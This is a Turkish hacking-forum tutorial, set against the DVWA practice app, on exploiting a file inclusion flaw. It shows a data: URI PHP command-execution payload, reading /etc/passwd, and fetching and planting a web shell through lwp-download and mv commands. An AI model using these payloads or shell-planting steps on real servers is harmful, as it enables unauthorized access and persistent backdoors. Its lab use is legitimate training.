THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

File İnclusion Zaafiyeti ile Sisteme SHELL Sokma //Stajyer Asistan Kulübü

TheXEnd - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
08/2017
Nereden:
X'den
Mesajlar:
395
Konular:
76
Teşekkür (Etti):
1
Teşekkür (Aldı):
149
Ticaret:
(0) %
13-09-2017 12:24
#1
File İnclusion Zaafiyeti ile Sisteme SHELL Sokma //Stajyer Asistan Kulübü
Merhaba değerli TürkHackTeam üyeleri

Bu konumda sizlere File İnclusion zaafiyeti ile sisteme nasıl dosya dahil ederiz göstereceğim



Ben bu saldırıyı DVWA sistemi üzerinden anlatacağım. Öncelikle sisteme giriş yapalım ve zorluğu "low" olarak ayarladıktan sonra sol taraftan "File İnclusion" bölümüne giriyorum. Ve URL'de ?page= kodunu görüyorum. Bu bize istediğimiz sayfayı çalıştırma anlamına geliyor ve örnek olarak /etc/passwd dosyasına ulaşıp ulşamadığımıza bakıyorum ve ulaşıyorum. İşte "File İnclusion" zaafiyetinin tespitini yapmış olduk. Sonraki aşamaya geçelim.


Şimdi URL'nin istediğimiz komutu çalıştırıp çalıştırmadığını kontrol edelim. Yaptığımız şey bir nevi "Command Execution" zaafiyeti gibi
bir şey olacak. Yazacağımız komut:

data:, <?php system($_GET[%27cmd%27]); ?>&cmd=ls

Bulunduğumuz konumdaki dosyi dosyaları listelemeye çalıştım.

Şimdi sıra sisteme shell sokma işleminde. Öncelikle shell nedir? Shell yüklenen sisteme bize bir takım erişim yetkisi veren dosyadır. Öncelikle shell dosyasının indirme işleminden başlıyoruz. indirmek için "wget" komutunu kullanabiliriz ancak bazı sistemler wget komutunu çalıştırmıyor. Bunun yerine farklı bir komut kullanacağız. Bu komutu son verdiğim komuttaki "cmd=" kısmından sonra yazacağız. Komut ise şu:

cd /tmp; lwp-download shell_indirme_linki;

Böylelikle shell dosyamızı indirmiş olduk.


Şimdi ise indirdiğimiz dosyanın inip inmediğini kontrol etmeye biraz önce anlattığım yere şu komutu yazalım:

cd /tmp; ls;

Çıkan sonuçta "shell_adi.txt" şeklide bir dosya görürseniz devam edin.


Şimdi indirdiğimiz dosyayı "php" uzantısına çevireceğiz. Bunun için şu komutu yazalım:

cd /tmp; mv shell_adi.txt shell_adi.php

Böylelikle shellimizi php uzantısına çevirdik.

İstersek bir üstteki adımdaki gibi shell dosyamızın php uzantısı olup olmadığını kontrol edebiliriz. Şimdi ise hangi dizinde olduğumuzu öğrenmeye geldi.

pwd

Komutunu yazarak bulunduğumuz dizini öğrenebiliriz. Çıkan sonucu kopyalayalım.

Sıra shellimizi taşımakta

cd /tmp; mv shell_adi.php kopyaladigimiz/dizin

Şeklindeki komutla dizinimize taşıyoruz.


Taşıma işlemi bittikten sonra DVWA'ya dönüyoruz ve URL'yi "/fi"'ye kadar siliyoruz ve URL'ye

/shell_adi.php

Ekliyoruz ve BİNGO! Shellimiz çalışmakta.

Evet arkadaşlar bu konum bu kadardı. Allah'a emanet.
Bade Perest Teşekkür etti.
Bade Perest - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2017
Yaş:
99
Mesajlar:
1.696
Konular:
137
Teşekkür (Etti):
365
Teşekkür (Aldı):
252
Ticaret:
(0) %
13-09-2017 12:28
#2
Eline saglik.gayet detayli bir konu olmus.
TheXEnd - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
08/2017
Nereden:
X'den
Mesajlar:
395
Konular:
76
Teşekkür (Etti):
1
Teşekkür (Aldı):
149
Ticaret:
(0) %
13-09-2017 12:29
#3
Sağol

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler